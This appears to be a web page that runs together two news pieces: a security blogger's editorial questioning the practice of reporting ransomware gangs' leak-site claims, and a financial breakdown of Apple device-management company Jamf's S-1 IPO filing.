Currently, more than a dozen ransomware crime gangs have erected their own blogs to publish sensitive data from victims. A few of these blogs routinely issue self-serving press releases, some of which gallingly refer to victims as “clients” and cast themselves in a beneficent light. Usually, the blog posts that appear on ransom sites are little more than a teaser — screenshots of claimed access to computers, or a handful of documents that expose proprietary or financial information.

The goal behind the publication of these teasers is clear, and the ransomware gangs make no bones about it: To publicly pressure the victim company into paying up. Those that refuse to be extorted are told to expect that huge amounts of sensitive company data will be published online or sold on the dark web (or both).

Emboldened by their successes, several ransomware gangs recently have started demanding two ransoms: One payment to secure a digital key that can unlock files, folders and directories encrypted by their malware, and a second to avoid having any stolen information published or shared with others.

KrebsOnSecurity has sought to highlight ransomware incidents at companies whose core business involves providing technical services to others — particularly managed service providers that have done an exceptionally poor job communicating about the attack with their customers.

Overall, I’ve tried to use each story to call attention to key failures that frequently give rise to ransomware infections, and to offer information about how other companies can avoid a similar fate.

But simply parroting what professional extortionists have posted on their blog about victims of cybercrime smacks of providing aid and comfort to an enemy that needs and deserves neither.

Maybe you disagree, dear readers? Feel free to sound off in the comments below.

Apple device management company Jamf files S-1 as it prepares to go public

Jamf, the Apple device management company, filed to go public today. Jamf might not be a household name, but the Minnesota company has been around since 2002 helping companies manage their Apple equipment.

In the early days, that was Apple computers. Later it expanded to also manage iPhones and iPads. The company launched at a time when most IT pros had few choices for managing Macs in a business setting.

Jamf changed that, and as Macs and other Apple devices grew in popularity inside organizations in the 2010s, the company’s offerings grew in demand. Notably, over the years Apple has helped Jamf and its rivals considerably, by building more sophisticated tooling at the operating system level to help manage Macs and other Apple devices inside organizations.

Jamf raised approximately $50 million of disclosed funding before being acquired by Vista Equity Partners in 2017 for $733.8 million, according to the S-1 filing. Today, the company kicks off the high-profile portion of its journey toward going public.

Apple device management takes center stage

In a case of interesting timing, Jamf is filing to go public less than a week after Apple bought mobile device management startup Fleetsmith. At the time, Apple indicated that it would continue to partner with Jamf as before, but with its own growing set of internal tooling, which could at some point begin to compete more rigorously with the market leader.

Other companies managing Apple devices besides Jamf and Fleetsmith include Addigy and Kandji. More general offerings in the mobile device management (MDM) space include MobileIron and VMware AirWatch.

Vista is a private equity shop with a specific thesis around buying out SaaS and other enterprise companies, growing them, and then exiting them onto the public markets or getting them acquired by strategic buyers. Examples include Ping Identity, which the firm bought in 2016 before taking it public last year, and Marketo, which Vista bought in 2016 for $1.8 billion and sold to Adobe last year for $4.8 billion, turning a tidy profit.

Inside the machine

Now that we know where Jamf sits in the market, let’s talk about it from a purely financial perspective.

Jamf is a modern software company, meaning that it sells its digital services on a recurring basis. In the first quarter of 2020, for example, about 83% of its revenue came from subscription software. The rest was generated by services and software licenses.

Now that we know what type of company Jamf is, let’s explore its growth, profitability and cash generation. Once we understand those facets of its results, we’ll be able to understand what it might be worth and if its IPO appears to be on solid footing.

We’ll start with growth. In 2018 Jamf recorded $146.6 million in revenue, which grew to $204.0 million in 2019. That works out to an annual growth rate of 39.2%, a more than reasonable pace of growth for a company going public. It’s not super quick, mind, but it’s not slow either. More recently, the company grew 36.9% from $44.1 million in Q1 2019 to $60.4 million in revenue in Q1 2020. That’s a bit slower, but not too much slower.

Turning to profitability, we need to start with the company’s gross margins. Then we’ll talk about its net margins. And, finally, adjusted profits.

Gross margins help us understand how valuable a company’s revenue is. The higher the gross margins, the better. SaaS companies like Jamf tend to have gross margins of 70% or above. In Jamf’s own case, it posted gross margins of 75.1% in Q1 2020, and 72.5% in 2019. Jamf’s gross margins sit comfortably in the realm of SaaS results, and, perhaps even more importantly, are improving over time.

Getting behind the curtain

When all its expenses are accounted for, the picture is less rosy, and Jamf is unprofitable. The company’s net losses for 2018 and 2019 were similar, totaling $36.3 million and $32.6 million, respectively. Jamf’s net loss improved a little in Q1, falling from $9.0 million in 2019 to $8.3 million this year.

The company remains weighed down by debt, however, which cost it nearly $5 million in Q1 2020, and $21.4 million for all of 2019. According to the S-1, Jamf is sporting a debt-to-equity ratio of roughly 0.8, which may be a bit higher than your average public SaaS company, and is almost certainly a function of the company’s buyout by a private equity firm.

But the company’s adjusted profit metrics strip out debt costs, and under the heavily massaged adjusted earnings before interest, taxes, depreciation and amortization (EBITDA) metric, Jamf’s history is only one of rising profitability: adjusted EBITDA grew from $6.6 million in 2018 to $20.8 million in 2019, and from $4.3 million in Q1 2019 to $5.6 million in Q1 2020, with close to 10% adjusted operating profit margins through YE 2019.

It will be interesting to see how the company’s margins will be affected by COVID-19, with financials for that period still left blank in this initial version of the S-1. The enterprise market in general has been reasonably resilient to the recent economic shock, and device management may actually perform above expectations, given the growing push for remote work.

Completing the picture

Something notable about Jamf is that it has positive cash generation, even if in Q1 it tends to consume cash that is made up for in other quarters. In 2019, the firm posted $11.2 million in operational cash flow. That’s a good result, and better than 2018’s $9.4 million of operating cash generation. (The company’s investing cash flows have often run negative due to Jamf acquiring other companies, like ZuluDesk and Digita.)

With Jamf, we have a SaaS company that is growing reasonably well, has solid, improving margins, non-terrifying losses, growing adjusted profits and what looks like a reasonable cash flow perspective. But Jamf is cash poor, with just $22.7 million in cash and equivalents as of the end of Q1 2020 — some months ago now. At that time, the firm also had debts of $201.6 million.

Given the company’s worth, that debt figure is not terrifying. But the company’s thin cash balance makes it a good IPO candidate; going public will raise a chunk of change for the company, giving it more operating latitude and also possibly a chance to lower its debt load. Indeed, Jamf notes that it intends to use part of its IPO raise “to repay outstanding borrowings under our term loan facility…” Paying back debt at IPO is common in private equity buyouts.

So what?

Jamf’s march to the public markets adds its name to a growing list of companies. The market is already preparing to ingest Lemonade and Accolade this week, and there are rumors of more SaaS companies in the wings, just waiting to go public.

There’s a reasonable chance that as COVID-19 continues to run roughshod over the United States, the public markets eventually lose some momentum. But that isn’t stopping companies like Jamf from rolling the dice and taking a chance going public.